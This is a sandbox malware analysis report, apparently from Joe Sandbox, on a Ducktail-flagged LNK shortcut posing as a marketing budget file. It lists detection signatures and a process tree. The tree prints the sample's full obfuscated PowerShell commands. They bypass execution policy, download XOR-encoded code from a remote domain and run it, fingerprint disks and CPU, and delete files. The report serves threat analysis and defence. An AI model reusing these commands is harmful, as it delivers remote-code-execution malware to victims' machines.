Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk

Overview

General Information

Sample name:SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnk
Analysis ID:1551869
MD5:fd9940203c5ab5408fbb9dd774eba20f
SHA1:422f2f293d4f23f090520816f158a64acae1d33b
SHA256:a0ba93db49885e9631ec4487b711cbf95b0852ef404ff33e468b9d330524b7a7
Infos:

Detection

Ducktail
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Ducktail
Allows multiple concurrent remote connection
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Modifies security policies related information
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: PowerShell Base64 Encoded WMI Classes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 7852 cmdline: "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 7944 cmdline: POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 7372 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7404 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8A4C.tmp" "c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • powershell.exe (PID: 5892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • AcroRd32.exe (PID: 6376 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf" MD5: 0F4FB7ADA3C27236864D008A1687AD8D)
          • RdrCEF.exe (PID: 7364 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
            • RdrCEF.exe (PID: 4308 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2348 --field-trial-handle=1660,i,15687082423060682323,12488084436830173186,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 35AF5C1FA6FAC9569BB3FF6654A7152E)
      • cmd.exe (PID: 6356 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 4780 cmdline: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WmiPrvSE.exe (PID: 8832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svczHost.exe (PID: 5060 cmdline: C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com MD5: EB57894A8FF610DF55C97E427D0DDD7B)
    • conhost.exe (PID: 2468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1228 cmdline: "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 8508 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 6820 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • powershell.exe (PID: 7632 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
